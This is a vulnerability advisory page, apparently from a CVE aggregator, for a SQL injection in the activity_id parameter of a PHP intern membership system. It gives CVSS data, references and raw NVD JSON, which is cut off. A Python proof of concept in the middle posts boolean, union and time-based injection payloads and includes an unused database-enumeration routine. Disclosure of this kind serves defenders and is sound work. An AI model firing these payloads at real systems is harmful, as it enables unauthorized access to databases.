CVE-2026-0850

Description

A vulnerability was determined in code-projects Intern Membership Management System 1.0. Impacted is an unknown function of the file /admin/delete_activity.php. Executing a manipulation of the argument activity_id can lead to sql injection. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:carmelo:intern_membership_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

Intern Membership Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-0850 SQL Injection PoC
# Target: /admin/delete_activity.php
# Parameter: activity_id

import requests

target_url = "http://target.com/admin/delete_activity.php"

# Basic SQL Injection PoC - Boolean Based
def test_sql_injection():
    # Normal request
    normal_data = {"activity_id": "1"}
    
    # SQL Injection payloads
    payloads = [
        "1' OR '1'='1",
        "1' UNION SELECT 1,2,3--",
        "1' AND SLEEP(5)--",
        "1' OR 1=1 LIMIT 1--"
    ]
    
    for payload in payloads:
        data = {"activity_id": payload}
        try:
            response = requests.post(target_url, data=data, timeout=10)
            print(f"Payload: {payload}")
            print(f"Status: {response.status_code}")
            print(f"Response Length: {len(response.text)}")
            print("---")
        except requests.exceptions.RequestException as e:
            print(f"Error: {e}")

# Database Enumeration PoC
def enumerate_database():
    # Extract database version
    version_payload = "1' UNION SELECT 1,version(),3--"
    data = {"activity_id": version_payload}
    response = requests.post(target_url, data=data)
    print(f"Database Version: {response.text}")
    
    # Extract current database
    db_payload = "1' UNION SELECT 1,database(),3--"
    data = {"activity_id": db_payload}
    response = requests.post(target_url, data=data)
    print(f"Current Database: {response.text}")

if __name__ == "__main__":
    test_sql_injection()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0850
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0850
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0850/
[4] VulDB https://vuldb.com/cve/CVE-2026-0850
[5] https://code-projects.org/
[6] https://github.com/xkalami-Tta0/CVE/blob/main/Intern%20Membership%20Management%20System/Intern%20Membership%20Management%20System%20delete_activity.php%20sql%20injection.md
[7] https://vuldb.com/?ctiid.340445
[8] https://vuldb.com/?id.340445
[9] https://vuldb.com/?submit.733486

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0850", "sourceIdentifier": "[email protected]", "published": "2026-01-11T23:15:46.090", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in code-projects Intern Membership Management System 1.0. Impacted is an unknown function of the file /admin/delete_activity.php. Executing a manipulation of the argument activity_id can lead to sql injection. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized."}, {"lang": "es", "value": "Se determinó una vulnerabilidad en code-projects Intern Membership Management System 1.0. Afectada es una función desconocida del archivo /admin/delete_activity.php. Ejecutar una manipulación del argumento activity_id puede llevar a inyección SQL. El ataque puede ser lanzado remotamente. El exploit ha sido divulgado públicamente y puede ser utilizado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:carmelo:intern_membership_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "88D4A3D1-C585-45AA-BFF9-FAEA515181FD"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/xkalami-Tta0/CVE/blob/main/Intern%20Membership%20Management%20System/Intern%20Membership%20Management%20System%20delete_activity.php%20sql%20injection.md", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://vuldb.com/?ctiid.340445", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.340445", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://v ... (truncated)